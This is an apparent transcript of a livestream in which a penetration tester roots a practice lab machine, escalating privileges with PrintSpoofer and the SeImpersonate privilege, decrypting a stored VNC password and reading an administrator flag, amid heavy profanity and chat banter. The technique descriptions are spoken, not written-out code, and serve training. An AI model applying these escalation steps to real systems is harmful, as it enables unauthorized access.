supposed to be routed by print spoofer? No. No, this was the intended route. But they gave the... But why does print spoofer work, chat? Why did I immediately, as soon as I got on the box, run whoami/priv? I think I ran whoami/all, but that was the first thing I did. Why? Why did I immediately think that print spoofer would work? Consider that for a moment. Just to improve... Well, yeah, because of SC impersonate privilege. But why did I think that SC impersonate privilege would be present? I was pretty sure when I got on the box that SC impersonate privilege would be present. Why? How do I use this fucking thing? Like, this is ridiculous. How long do I need to wait? How does this work? Someone please tell me how this fucking garbage works. God damn it. Maybe it has some... I can just look at the source code and figure out how to use this fucking garbage, because I can't wait for this shit to work anymore. I just want to know how to use it. Any VNC which uses the original VNC encryption, like real VNC, tight VNC. You can pass it the file.vnc. There's a .vnc file then? Or is it the INI file that you guys are telling me about? Well, I guess we'll try it with the INI file. This is absolutely intolerable. I can't take this box anymore. Let's try that. Please execute in the next fucking 300 million years. You know, here's a fun fact for you. There is more time between Stegosaurus and Tyrannosaurus existing than there is between Tyrannosaurus and us. And also, there's more time between Stegosaurus and Tyrannosaurus existing than this box takes to execute a Who Am I command. And we're not seeing anything. Like, there's no output or anything. Like, this is unbelievable. This is absolutely fucking crazy. I can't do this anymore, guys. I'm about to give up. Unless anyone... Like, I cannot even tinker. I don't know how this works. And I can't tinker with it because we don't even get output from it. I'm not even getting output from it. And it takes 5,000 hours to get any output. There is a password, an encrypted password here. This is disgusting. How did you know to check for SE impersonate? Because we were getting code execution through the web app, remember? Service accounts will usually have SE impersonate privilege because they need it for their normal operation. So I was pretty sure I'd have SE impersonate privilege right off the bat. This is absolutely disgusting. I can't do this anymore, guys. I literally, I'm giving it the file. We don't get any output. There's no output. I don't know what it wants. I don't know what I'm supposed to do. And it takes 5,000 hours for the box to respond to anything. I mean, the executable doesn't even have output. We don't even see the output. The encrypted password is in... Oh, here we go. It finally gave us output. Okay. I guess support 9 is the password. Jesus. Like, am I even gonna be able to fucking see the... I guess let's try to log in as administrator now, I guess. Although we tried this before, and it did not work. Despite being an administrator, we did not have access to the admin dollar share. Well, we'll try it. Yeah, the box doesn't even fucking respond 90% of the time. Like, it just times out. That's how long it takes the bot to respond. Or the box to respond. We are waiting. Okay, we do have pwned here, so we can probably just execute a command. Type C users administrator desktop admin flag.txt. That's what it says the flag is called on the page over here. Broken pipe. Yippee. Thank you. God. Nothing is ever easy, dude. Holy shit. Oh my god. This is insane. It is absolutely insane how fucking painful this box is. For absolutely no reason. It shouldn't matter if I put CMD/C. It shouldn't matter. It is absolutely fucking insane. Is it worth learning ethical hacking? Absolutely, if you're interested in it. It's very frustrating, though. Like, sometimes you'll have a box that just won't fucking respond to you for no reason. This is absolutely intolerable. This box just needs to be taken down. This is fucking gross. Like, it is impossible to do anything on this machine. It doesn't respond to anything. This does not happen in real life? Oh, it sure does, but it's rarely this bad. Networks need to be working in order to be hackable. So generally, when you're hacking something, it's going to be functioning. How much time do you need to learn to be considered good? Depends on what you consider good. My recommendation is you're never going to feel good. You're never going to feel good. You're always just going to... The key is to just always be learning more and always be improving. But yes, it takes a lot of time. It takes a lot of effort. It takes a lot of frustration. That's what I show you on this stream. This is fucking crazy. Like, you can't interact with this box with anything. This box does not respond to fucking anything. This is fucking nutty. Like, we just sit here for 5,000 hours waiting for the box to respond to even the simplest stuff. Dude, I don't even think this is a Pentium. This is like Windows 95 speed. What are the necessary skills for a junior pen tester? Oh, God, dude. I would say EJPT and OSCP would teach you those skills. Spatic-Distic, thank you for the first time Prime indoctrination into the cult. Welcome to the All Has Red Sea, my friend. Thanks for supporting the stream. Lucky Girl and Alex Tio, thank you for the follow. Like, I can't get anything to work here, guys. This box does not respond to any commands. Like, for no reason. There's, like, the box just doesn't work. It's just fundamentally broken. Like, it's running on, like, half of a thread. Like, literally the whole box is on half of a thread. And it takes so long for it to do anything. Dude, I would be happy just for dial-up connection on this box. Dial-up was faster than this. Like, I could load my friend's fucking MySpace page with good Charlotte and all that shitty HTML and, like, all those pictures and the music that was always playing in the background, on a dial-up modem faster than this box responds to a Who Am I command. This is insane. Like, this is fucking crazy. Can you check? What am I supposed to do with that, Slick Pup? What in the name of God am I supposed to do with that? I can't even get the box to execute my commands. I've already rebooted it 3 times, Nomanon. This is the 4th time we're trying to get through this box. Oh my God, we're finally here. Jesus fucking Christ. It only took like 3 or 4 minutes. Just for context, I've never seen WMI exec take that long. I have never seen it. I use this all the time on real assessments, and I've never seen it take this long. This is absolutely insane. We did try Netstat. Yes, we did try Netstat. Listen, hacking is a frustrating enterprise, fellas. If you're not prepared to deal with frustration, it's not the right place for you. Like, you might think I get pissed, but and I do get pissed. You're gonna get pissed. Hacking is very frustrating. How much time have you been in this field? Since 2013. Play Elden Ring? I have played Elden Ring. I put 200 hours into Elden Ring. I've 100%ed Elden Ring 3 times. I don't know what you define as 100%, actually. But I've beaten Elden Ring all the way through 3 times. And I did all of the quests. We finally got there. Holy shit, the gerbils made it. Okay, they can rest now. The gerbils can finally rest, chat. What do you usually do after streams? Sit and stare at the wall for like an hour? Because streams are very tiring for me. Alright, we did it. Alright. I got my computer back and bought a NAS. Oh, that's good. That's pretty good. Alright, we got there. Any last questions? Let's look for someone to raid here. It's usually... Yeah, I'm really glad to hear that, Hate Handles. Oh, man. Moist Critical's playing God of War? I gotta watch that. I'm gonna watch that. I could raid my brother. You guys want to check out my brother's stream? Why don't we give my brother a raid? He's streaming. He's streaming Black Desert Online. But he's got my personality. We'll go ahead and give him a raid. It's Slim Pickens on Sunday. Weeb? Yes, he is a weeb. Not as much of a weeb as I was in high school, but he definitely is. He's a gamer. Imagine that, guys. Imagine playing video games on Twitch. What a fucking nerd, right? What a fucking nerd. You gotta be doing like gigantic brain, Giga Chad, eldritch hacking, dark magic, okay? That's what the real Twitch streamers do, okay? All right. Well, this is my actual brother. He plays a on stream. He typically plays a MMO video game called Black Desert Online. You'll see that a bunch of you asked if he molds like I do. Dude, I don't even come close to his level of molding. I don't even come close. Tim's level of molding is way above mine. He's outclassing me. My molding looks like I look calm compared to him. No joke. Are you streaming Tuesday? I do plan to stream Tuesday, but we'll see how I'm feeling on that day. If I get my packing done ahead of time. It'll be Newbie Tuesday, so if you're new, that'll be the day to watch. I do go to DEF CON this week, so Thursday and Sunday there will be no stream, but you'll probably see me on DEF CON regardless. Go to bed tonight knowing a little bit more than you did yesterday. See you guys again when the stars are right. Reach out to me on Discord if you have any questions, comments, threats, or bribes. Stay safe. Enjoy the rest of your weekend.